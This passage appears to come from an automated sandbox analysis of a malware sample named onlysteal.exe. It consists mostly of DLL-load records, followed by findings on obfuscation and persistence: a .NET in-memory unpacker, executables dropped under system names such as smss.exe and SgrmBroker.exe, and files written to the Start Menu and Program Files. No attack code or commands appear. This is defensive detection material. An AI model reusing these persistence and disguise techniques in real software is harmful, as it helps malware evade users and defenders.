                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: propsys.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: apphelp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dlnashext.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wpdshext.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: edputil.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: urlmon.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: iertutil.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: srvcli.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: netutils.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wintypes.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: appresolver.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: slc.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: userenv.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sppc.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mscoree.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: version.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wldp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: profapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sspicli.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasapi32.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasman.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rtutils.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mswsock.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: winhttp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: propsys.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: apphelp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dlnashext.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wpdshext.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: edputil.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: urlmon.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: iertutil.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: srvcli.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: netutils.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wintypes.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: appresolver.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: slc.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: userenv.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sppc.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mscoree.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: version.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wldp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: profapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sspicli.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasapi32.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasman.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rtutils.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mswsock.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: winhttp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: propsys.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: apphelp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dlnashext.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wpdshext.dll
                                  Source: C:\Users\user\Desktop\onlysteal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: onlysteal.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: onlysteal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: onlysteal.exe
                                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: SgrmBroker.exe, 00000011.00000002.2764836451.000000001BAFB000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: System.pdb source: SgrmBroker.exe, 00000011.00000002.2764836451.000000001BAFB000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdll source: SgrmBroker.exe, 0000001B.00000002.3343374036.000000000105A000.00000004.00000020.00020000.00000000.sdmp
                                  Source: onlysteal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: onlysteal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: onlysteal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: onlysteal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: onlysteal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  .NET source code contains potential unpacker
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, 857.cs.Net Code: _736
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, 857.cs.Net Code: _736
                                  Source: C:\Users\user\Desktop\onlysteal.exeFile created: C:\Intorefnet\__tmp_rar_sfx_access_check_7327421Jump to behavior
                                  Source: onlysteal.exeStatic PE information: section name: .didat
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024F640 push ecx; ret 0_2_0024F653
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024EB78 push eax; ret 0_2_0024EB96
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 5_2_00007FFD34883CB9 push ebx; retf 5_2_00007FFD34883CBA
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 5_2_00007FFD348800BD pushad ; iretd 5_2_00007FFD348800C1
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 5_2_00007FFD3489739E push ebp; retf 5_2_00007FFD348973A8
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 5_2_00007FFD34A60878 push esp; retf 5_2_00007FFD34A60879
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD348A00BD pushad ; iretd 11_2_00007FFD348A00C1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD348B739E push ebp; retf 11_2_00007FFD348B73A8
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD34A85BBD push ebx; ret 11_2_00007FFD34A85BCA
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD348C00BD pushad ; iretd 17_2_00007FFD348C00C1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD348D739E push ebp; retf 17_2_00007FFD348D73A8
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD34AA5BBD push ebx; ret 17_2_00007FFD34AA5BCA
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD348900BD pushad ; iretd 22_2_00007FFD348900C1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD34A75BBD push ebx; ret 22_2_00007FFD34A75BCA
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD348900BD pushad ; iretd 27_2_00007FFD348900C1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD348A7BAC push eax; ret 27_2_00007FFD348A7BAD
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD348A739E push ebp; retf 27_2_00007FFD348A73A8
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD34A75BBD push ebx; ret 27_2_00007FFD34A75BCA

                                  Persistence and Installation Behavior

                                  barindex
                                  Drops PE files with benign system names
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\ProgramData\smss.exeJump to dropped file
                                  Drops executable to a common third party application directory
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile written: C:\Program Files (x86)\Internet Explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exeJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\ProgramData\smss.exeJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\wYGfctxY.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\kzbsFheO.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\user\Desktop\vmGXvtnF.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\zVMHRGyj.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\Default\Saved Games\IadHSrMxJwYAMPkyRTLDEKgeW.exeJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\user\Desktop\plugneHL.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exeJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\RpedHXOW.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\BUHwkZnR.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\DYEovgjB.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\FPzqkKvM.logJump to dropped file
                                  Source: C:\Users\user\Desktop\onlysteal.exeFile created: C:\Intorefnet\hyperBlockCrtCommon.exeJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Program Files (x86)\Internet Explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exeJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\AchrHOgY.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\ProgramData\smss.exeJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\user\Desktop\vmGXvtnF.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\user\Desktop\plugneHL.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\BUHwkZnR.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\wYGfctxY.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\DYEovgjB.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\RpedHXOW.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\kzbsFheO.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\zVMHRGyj.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\AchrHOgY.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile created: C:\Users\user\Desktop\FPzqkKvM.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\Default\Start Menu\Programs\SgrmBroker.exeJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\Default\Start Menu\Programs\91e168f4ec1147Jump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
